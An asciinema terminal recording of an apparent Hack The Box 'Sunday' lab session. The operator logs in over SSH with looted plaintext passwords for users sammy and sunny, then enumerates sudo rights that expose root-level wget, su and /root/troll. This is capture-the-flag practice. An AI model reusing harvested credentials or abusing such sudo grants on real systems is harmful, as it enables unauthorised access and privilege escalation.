{"version": 2, "width": 236, "height": 101, "timestamp": 1662221347, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.021461, "o", "\u001b[?2004h"]
[0.022233, "o", "\u001b]0;root@kali: ~/htb/sunday/10.10.10.76/loot/loot\u0007\u001b[;94m┌──(\u001b[1;31mroot💀kali\u001b[;94m)-[\u001b[0;1m~/htb/sunday/10.10.10.76/loot/loot\u001b[;94m]\r\r\n\u001b[;94m└─\u001b[1;31m#\u001b[0m "]
[2.370875, "o", "t"]
[2.474828, "o", "m"]
[2.960622, "o", "u"]
[3.072501, "o", "x"]
[3.141659, "o", " "]
[3.39365, "o", "-"]
[3.859683, "o", "\b\u001b[K"]
[4.045522, "o", "n"]
[4.062562, "o", "e"]
[4.143401, "o", "w"]
[4.234639, "o", " "]
[4.307676, "o", "-"]
[4.444615, "o", "s"]
[4.564699, "o", " "]
[5.127108, "o", "t"]
[5.292682, "o", "r"]
[5.350126, "o", "o"]
[5.516502, "o", "l"]
[5.63561, "o", "l"]
[5.717861, "o", "\r\n\u001b[?2004l\r"]
[5.729121, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[?1006l\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?2004l\u001b[1;1H\u001b[1;101r\u001b[>c\u001b[>q\u001b[1;1H"]
[5.730062, "o", "\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[troll] 0:bash*                                                                                                                                                                                                       \"kali\" 00:09 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H"]
[5.730449, "o", "\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[?1006l\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?2004l\u001b[1;1H\u001b[1;101r\u001b[1;1H"]
[5.730951, "o", "\u001b[?25l\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[30m\u001b[42m\r\n[troll] 0:bash*                                                                                                                                                                                                       \"kali\" 00:09 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;1H"]
[5.744022, "o", "\u001b[?7727h"]
[5.764194, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\r\n└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[?2004h"]
[9.089724, "o", "\u001b[7msshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b(B\u001b[m"]
[9.171968, "o", "\u001b[5Gsshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\r\n\u001b[?2004l"]
[10.109861, "o", "Last login: Sat Sep  3 16:07:11 2022 from 10.10.14.31\r\n"]
[10.110227, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[101d[troll] 0:sshpass*                                                                                                                                                                                                    \"kali\" 00:09 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[4;1H"]
[10.110725, "o", "Oracle Corporation      SunOS 5.11      11.4    Aug 2018\r\n"]
[10.11568, "o", "-bash-4.4$ "]
[10.567806, "o", "s"]
[10.706035, "o", "u"]
[10.852098, "o", "d"]
[10.948686, "o", "o"]
[11.105363, "o", " "]
[11.165614, "o", "-"]
[11.236233, "o", "l"]
[11.3289, "o", "\r\n"]
[11.337875, "o", "User sammy may run the following commands on sunday:\r\n    (ALL) ALL\r\n    (root) NOPASSWD: /usr/bin/wget\r\n    (root) NOPASSWD: /usr/bin/su"]
[11.338271, "o", "\r\n"]
[11.339323, "o", "-bash-4.4$ "]
[14.068179, "o", "\u001b[?25l\u001b[1;119H│\u001b[2;119H│\u001b[3;119H│\u001b[4;119H│\u001b[5;119H│\u001b[6;119H│\u001b[7;119H│\u001b[8;119H│\u001b[9;119H│\u001b[10;119H│\u001b[11;119H│\u001b[12;119H│\u001b[13;119H│\u001b[14;119H│\u001b[15;119H│\u001b[16;119H│\u001b[17;119H│\u001b[18;119H│\u001b[19;119H│\u001b[20;119H│\u001b[21;119H│\u001b[22;119H│\u001b[23;119H│\u001b[24;119H│\u001b[25;119H│\u001b[26;119H│\u001b[27;119H│\u001b[28;119H│\u001b[29;119H│\u001b[30;119H│\u001b[31;119H│\u001b[32;119H│\u001b[33;119H│\u001b[34;119H│\u001b[35;119H│\u001b[36;119H│\u001b[37;119H│\u001b[38;119H│\u001b[39;119H│\u001b[40;119H│\u001b[41;119H│\u001b[42;119H│\u001b[43;119H│\u001b[44;119H│\u001b[45;119H│\u001b[46;119H│\u001b[47;119H│\u001b[48;119H│\u001b[49;119H│\u001b[50;119H│\u001b[51;119H│\u001b[52;119H\u001b[32m│\u001b[53;119H│\u001b[54;119H│\u001b[55;119H│\u001b[56;119H│\u001b[57;119H│\u001b[58;119H│\u001b[59;119H│\u001b[60;119H│\u001b[61;119H│\u001b[62;119H│\u001b[63;119H│\u001b[64;119H│\u001b[65;119H│\u001b[66;119H│\u001b[67;119H│\u001b[68;119H│\u001b[69;119H│\u001b[70;119H│\u001b[71;119H│\u001b[72;119H│\u001b[73;119H│\u001b[74;119H│\u001b[75;119H│\u001b[76;119H│\u001b[77;119H│\u001b[78;119H│\u001b[79;119H│\u001b[80;119H│\u001b[81;119H│\u001b[82;119H│\u001b[83;119H│\u001b[84;119H│\u001b[85;119H│\u001b["]
[14.068415, "o", "86;119H│\u001b[87;119H│\u001b[88;119H│\u001b[89;119H│\u001b[90;119H│\u001b[91;119H│\u001b[92;119H│\u001b[93;119H│\u001b[94;119H│\u001b[95;119H│\u001b[96;119H│\u001b[97;119H│\u001b[98;119H│\u001b[99;119H│\u001b[100;119H│\u001b(B\u001b[m\u001b[1;118H\u001b[1K\u001b[94m\u001b[H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[2;118H\u001b[1K\u001b[94m\r└─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b[3;118H\u001b[1K\rLast login: Sat Sep  3 16:07:11 2022 from 10.10.14.31\u001b[4;118H\u001b[1K\rOracle Corporation      SunOS 5.11      11.4    Aug 2018\u001b[5;118H\u001b[1K\r-bash-4.4$ sudo -l\u001b[6;118H\u001b[1K\rUser sammy may run the following commands on sunday:\u001b[7;118H\u001b[1K\r    (ALL) ALL\u001b[8;118H\u001b[1K\r    (root) NOPASSWD: /usr/bin/wget\u001b[9;118H\u001b[1K\r    (root) NOPASSWD: /usr/bin/su\u001b[10;118H\u001b[1K\r-bash-4.4$ \u001b[11;118H\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1"]
[14.068589, "o", "K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[1;120H\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\n\u001b[K\u001b[30m\u001b[42m\r\n[troll] 0:sshpass*                                                                                                                                                                                                    \"kali\" 00:09 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;120H"]
[14.069383, "o", "\u001b[?25l\b│\u001b[2;119H│\u001b[3;119H│\u001b[4;119H│\u001b[5;119H│\u001b[6;119H│\u001b[7;119H│\u001b[8;119H│\u001b[9;119H│\u001b[10;119H│\u001b[11;119H│\u001b[12;119H│\u001b[13;119H│\u001b[14;119H│\u001b[15;119H│\u001b[16;119H│\u001b[17;119H│\u001b[18;119H│\u001b[19;119H│\u001b[20;119H│\u001b[21;119H│\u001b[22;119H│\u001b[23;119H│\u001b[24;119H│\u001b[25;119H│\u001b[26;119H│\u001b[27;119H│\u001b[28;119H│\u001b[29;119H│\u001b[30;119H│\u001b[31;119H│\u001b[32;119H│\u001b[33;119H│\u001b[34;119H│\u001b[35;119H│\u001b[36;119H│\u001b[37;119H│\u001b[38;119H│\u001b[39;119H│\u001b[40;119H│\u001b[41;119H│\u001b[42;119H│\u001b[43;119H│\u001b[44;119H│\u001b[45;119H│\u001b[46;119H│\u001b[47;119H│\u001b[48;119H│\u001b[49;119H│\u001b[50;119H│\u001b[51;119H│\u001b[52;119H\u001b[32m│\u001b[53;119H│\u001b[54;119H│\u001b[55;119H│\u001b[56;119H│\u001b[57;119H│\u001b[58;119H│\u001b[59;119H│\u001b[60;119H│\u001b[61;119H│\u001b[62;119H│\u001b[63;119H│\u001b[64;119H│\u001b[65;119H│\u001b[66;119H│\u001b[67;119H│\u001b[68;119H│\u001b[69;119H│\u001b[70;119H│\u001b[71;119H│\u001b[72;119H│\u001b[73;119H│\u001b[74;119H│\u001b[75;119H│\u001b[76;119H│\u001b[77;119H│\u001b[78;119H│\u001b[79;119H│\u001b[80;119H│\u001b[81;119H│\u001b[82;119H│\u001b[83;119H│\u001b[84;119H│\u001b[85;119H│\u001b[86;119H"]
[14.06953, "o", "│\u001b[87;119H│\u001b[88;119H│\u001b[89;119H│\u001b[90;119H│\u001b[91;119H│\u001b[92;119H│\u001b[93;119H│\u001b[94;119H│\u001b[95;119H│\u001b[96;119H│\u001b[97;119H│\u001b[98;119H│\u001b[99;119H│\u001b[100;119H│\u001b(B\u001b[m\u001b[30m\u001b[42m\r\n[troll] 0:tmux*                                                                                                                                                                                                       \"kali\" 00:09 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[1;120H"]
[14.110709, "o", "\u001b[10;1H-bash-4.4$ \u001b[107X\u001b[1;120H"]
[14.112089, "o", "\u001b[94m┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[2;120H└─\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[?2004h"]
[16.917169, "o", "\u001b[?25l\u001b[1;119H│\u001b[2;119H│\u001b[3;119H│\u001b[4;119H│\u001b[5;119H│\u001b[6;119H│\u001b[7;119H│\u001b[8;119H│\u001b[9;119H│\u001b[10;119H│\u001b[11;119H│\u001b[12;119H│\u001b[13;119H│\u001b[14;119H│\u001b[15;119H│\u001b[16;119H│\u001b[17;119H│\u001b[18;119H│\u001b[19;119H│\u001b[20;119H│\u001b[21;119H│\u001b[22;119H│\u001b[23;119H│\u001b[24;119H│\u001b[25;119H│\u001b[26;119H│\u001b[27;119H│\u001b[28;119H│\u001b[29;119H│\u001b[30;119H│\u001b[31;119H│\u001b[32;119H│\u001b[33;119H│\u001b[34;119H│\u001b[35;119H│\u001b[36;119H│\u001b[37;119H│\u001b[38;119H│\u001b[39;119H│\u001b[40;119H│\u001b[41;119H│\u001b[42;119H│\u001b[43;119H│\u001b[44;119H│\u001b[45;119H│\u001b[46;119H│\u001b[47;119H│\u001b[48;119H│\u001b[49;119H│\u001b[50;119H│\u001b[51;119H│\u001b[52;119H\u001b[32m│\u001b[53;119H│\u001b[54;119H│\u001b[55;119H│\u001b[56;119H│\u001b[57;119H│\u001b[58;119H│\u001b[59;119H│\u001b[60;119H│\u001b[61;119H│\u001b[62;119H│\u001b[63;119H│\u001b[64;119H│\u001b[65;119H│\u001b[66;119H│\u001b[67;119H│\u001b[68;119H│\u001b[69;119H│\u001b[70;119H│\u001b[71;119H│\u001b[72;119H│\u001b[73;119H│\u001b[74;119H│\u001b[75;119H│\u001b[76;119H│\u001b[77;119H│\u001b[78;119H│\u001b[79;119H│\u001b[80;119H│\u001b[81;119H│\u001b[82;119H│\u001b[83;119H│\u001b[84;119H│\u001b[85;119H│\u001b["]
[16.917574, "o", "86;119H│\u001b[87;119H│\u001b[88;119H│\u001b[89;119H│\u001b[90;119H│\u001b[91;119H│\u001b[92;119H│\u001b[93;119H│\u001b[94;119H│\u001b[95;119H│\u001b[96;119H│\u001b[97;119H│\u001b[98;119H│\u001b[99;119H│\u001b[100;119H│\u001b(B\u001b[m\u001b[30m\u001b[42m\r\n[troll] 0:bash*                                                                                                                                                                                                       \"kali\" 00:09 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[2;124H"]
[16.918182, "o", "\u001b[7msshpass -p 'sunday' ssh sunny@sunday.htb -p 22022\u001b(B\u001b[m"]
[16.975798, "o", "\u001b[49Dsshpass -p 'sunday' ssh sunny@sunday.htb -p 22022\u001b[3;120H"]
[16.975846, "o", "\u001b[?2004l"]
[17.910179, "o", "Last login: Sat Sep  3 16:07:20 2022 from 10.10.14.31\u001b[4;120HOracle Corporation      SunOS 5.11      11.4    Aug 2018\u001b[5;120H"]
[17.91111, "o", "\u001b[?25l\u001b[1;119H│\u001b[2;119H│\u001b[3;119H│\u001b[4;119H│\u001b[5;119H│\u001b[6;119H│\u001b[7;119H│\u001b[8;119H│\u001b[9;119H│\u001b[10;119H│\u001b[11;119H│\u001b[12;119H│\u001b[13;119H│\u001b[14;119H│\u001b[15;119H│\u001b[16;119H│\u001b[17;119H│\u001b[18;119H│\u001b[19;119H│\u001b[20;119H│\u001b[21;119H│\u001b[22;119H│\u001b[23;119H│\u001b[24;119H│\u001b[25;119H│\u001b[26;119H│\u001b[27;119H│\u001b[28;119H│\u001b[29;119H│\u001b[30;119H│\u001b[31;119H│\u001b[32;119H│\u001b[33;119H│\u001b[34;119H│\u001b[35;119H│\u001b[36;119H│\u001b[37;119H│\u001b[38;119H│\u001b[39;119H│\u001b[40;119H│\u001b[41;119H│\u001b[42;119H│\u001b[43;119H│\u001b[44;119H│\u001b[45;119H│\u001b[46;119H│\u001b[47;119H│\u001b[48;119H│\u001b[49;119H│\u001b[50;119H│\u001b[51;119H│\u001b[52;119H\u001b[32m│\u001b[53;119H│\u001b[54;119H│\u001b[55;119H│\u001b[56;119H│\u001b[57;119H│\u001b[58;119H│\u001b[59;119H│\u001b[60;119H│\u001b[61;119H│\u001b[62;119H│\u001b[63;119H│\u001b[64;119H│\u001b[65;119H│\u001b[66;119H│\u001b[67;119H│\u001b[68;119H│\u001b[69;119H│\u001b[70;119H│\u001b[71;119H│\u001b[72;119H│\u001b[73;119H│\u001b[74;119H│\u001b[75;119H│\u001b[76;119H│\u001b[77;119H│\u001b[78;119H│\u001b[79;119H│\u001b[80;119H│\u001b[81;119H│\u001b[82;119H│\u001b[83;119H│\u001b[84;119H│\u001b[85;119H│\u001b["]
[17.911142, "o", "86;119H│\u001b[87;119H│\u001b[88;119H│\u001b[89;119H│\u001b[90;119H│\u001b[91;119H│\u001b[92;119H│\u001b[93;119H│\u001b[94;119H│\u001b[95;119H│\u001b[96;119H│\u001b[97;119H│\u001b[98;119H│\u001b[99;119H│\u001b[100;119H│\u001b(B\u001b[m\u001b[30m\u001b[42m\r\n[troll] 0:sshpass*                                                                                                                                                                                                    \"kali\" 00:09 04-Sep-22\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[5;120H"]
[17.914542, "o", "sunny@sunday:~$ "]
[18.625245, "o", "s"]
[18.729116, "o", "u"]
[18.890185, "o", "d"]
[18.961927, "o", "o"]
[19.095061, "o", " "]
[19.154822, "o", "-"]
[19.229533, "o", "l"]
[19.367856, "o", "\u001b[6;120H"]
[19.376458, "o", "User sunny may run the following commands on sunday:\u001b[7;120H"]
[19.376779, "o", "    (root) NOPASSWD: /root/troll"]
[19.376817, "o", "\u001b[8;120H"]
[19.37826, "o", "sunny@sunday:~$ "]
[20.975724, "o", "\u001b[?25l\u001b[1;119H\u001b[32m│\u001b[2;119H│\u001b[3;119H│\u001b[4;119H│\u001b[5;119H│\u001b[6;119H│\u001b[7;119H│\u001b[8;119H│\u001b[9;119H│\u001b[10;119H│\u001b[11;119H│\u001b[12;119H│\u001b[13;119H│\u001b[14;119H│\u001b[15;119H│\u001b[16;119H│\u001b[17;119H│\u001b[18;119H│\u001b[19;119H│\u001b[20;119H│\u001b[21;119H│\u001b[22;119H│\u001b[23;119H│\u001b[24;119H│\u001b[25;119H│\u001b[26;119H│\u001b[27;119H│\u001b[28;119H│\u001b[29;119H│\u001b[30;119H│\u001b[31;119H│\u001b[32;119H│\u001b[33;119H│\u001b[34;119H│\u001b[35;119H│\u001b[36;119H│\u001b[37;119H│\u001b[38;119H│\u001b[39;119H│\u001b[40;119H│\u001b[41;119H│\u001b[42;119H│\u001b[43;119H│\u001b[44;119H│\u001b[45;119H│\u001b[46;119H│\u001b[47;119H│\u001b[48;119H│\u001b[49;119H│\u001b[50;119H│\u001b[51;119H│\u001b[52;119H\u001b[39m│\u001b[53;119H│\u001b[54;119H│\u001b[55;119H│\u001b[56;119H│\u001b[57;119H│\u001b[58;119H│\u001b[59;119H│\u001b[60;119H│\u001b[61;119H│\u001b[62;119H│\u001b[63;119H│\u001b[64;119H│\u001b[65;119H│\u001b[66;119H│\u001b[67;119H│\u001b[68;119H│\u001b[69;119H│\u001b[70;119H│\u001b[71;119H│\u001b[72;119H│\u001b[73;119H│\u001b[74;119H│\u001b[75;119H│\u001b[76;119H│\u001b[77;119H│\u001b[78;119H│\u001b[79;119H│\u001b[80;119H│\u001b[81;119H│\u001b[82;119H│\u001b[83;119H│\u001b[84;119H│\u001b[85;119H"]
[20.975888, "o", "│\u001b[86;119H│\u001b[87;119H│\u001b[88;119H│\u001b[89;119H│\u001b[90;119H│\u001b[91;119H│\u001b[92;119H│\u001b[93;119H│\u001b[94;119H│\u001b[95;119H│\u001b[96;119H│\u001b[97;119H│\u001b[98;119H│\u001b[99;119H│\u001b[100;119H│\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[10;12H"]
[22.835929, "o", "\u001b[?25l\u001b[1;119H│\u001b[2;119H│\u001b[3;119H│\u001b[4;119H│\u001b[5;119H│\u001b[6;119H│\u001b[7;119H│\u001b[8;119H│\u001b[9;119H│\u001b[10;119H│\u001b[11;119H│\u001b[12;119H│\u001b[13;119H│\u001b[14;119H│\u001b[15;119H│\u001b[16;119H│\u001b[17;119H│\u001b[18;119H│\u001b[19;119H│\u001b[20;119H│\u001b[21;119H│\u001b[22;119H│\u001b[23;119H│\u001b[24;119H│\u001b[25;119H│\u001b[26;119H│\u001b[27;119H│\u001b[28;119H│\u001b[29;119H│\u001b[30;119H│\u001b[31;119H│\u001b[32;119H│\u001b[33;119H│\u001b[34;119H│\u001b[35;119H│\u001b[36;119H│\u001b[37;119H│\u001b[38;119H│\u001b[39;119H│\u001b[40;119H│\u001b[41;119H│\u001b[42;119H│\u001b[43;119H│\u001b[44;119H│\u001b[45;119H│\u001b[46;119H│\u001b[47;119H│\u001b[48;119H│\u001b[49;119H│\u001b[50;119H│\r\n\u001b[32m──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤\u001b[52;119H│\u001b[53;119H│\u001b[54;119H│\u001b[55;119H│\u001b[56;119H│\u001b[5"]
[22.836303, "o", "7;119H│\u001b[58;119H│\u001b[59;119H│\u001b[60;119H│\u001b[61;119H│\u001b[62;119H│\u001b[63;119H│\u001b[64;119H│\u001b[65;119H│\u001b[66;119H│\u001b[67;119H│\u001b[68;119H│\u001b[69;119H│\u001b[70;119H│\u001b[71;119H│\u001b[72;119H│\u001b[73;119H│\u001b[74;119H│\u001b[75;119H│\u001b[76;119H│\u001b[77;119H│\u001b[78;119H│\u001b[79;119H│\u001b[80;119H│\u001b[81;119H│\u001b[82;119H│\u001b[83;119H│\u001b[84;119H│\u001b[85;119H│\u001b[86;119H│\u001b[87;119H│\u001b[88;119H│\u001b[89;119H│\u001b[90;119H│\u001b[91;119H│\u001b[92;119H│\u001b[93;119H│\u001b[94;119H│\u001b[95;119H│\u001b[96;119H│\u001b[97;119H│\u001b[98;119H│\u001b[99;119H│\u001b[100;119H│\u001b(B\u001b[m\u001b[1;118H\u001b[1K\u001b[94m\u001b[H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[2;118H\u001b[1K\u001b[94m\r└─\u001b[31m\u001b[1m#\u001b(B\u001b[m sshpass -p 'cooldude!' ssh sammy@sunday.htb -p 22022\u001b[3;118H\u001b[1K\rLast login: Sat Sep  3 16:07:11 2022 from 10.10.14.31\u001b[4;118H\u001b[1K\rOracle Corporation      SunOS 5.11      11.4    Aug 2018\u001b[5;118H\u001b[1K\r-bash-4.4$ sudo -l\u001b[6;118H\u001b[1K\rUser sammy may run the following commands on sunday:\u001b[7;118H\u001b[1K\r    (ALL) ALL\u001b[8;118H\u001b[1K\r    "]
[22.836675, "o", "(root) NOPASSWD: /usr/bin/wget\u001b[9;118H\u001b[1K\r    (root) NOPASSWD: /usr/bin/su\u001b[10;118H\u001b[1K\r-bash-4.4$ \u001b[11;118H\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[2B\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\n\u001b[1K\u001b[94m\u001b[1;120H┌──(\u001b[31m\u001b[1mroot💀kali\u001b(B\u001b[m\u001b[94m)-[\u001b[39m\u001b[1m~/htb/sunday/10.10.10.76/loot/loot\u001b(B\u001b[m\u001b[94m]\u001b[39m\u001b[K\u0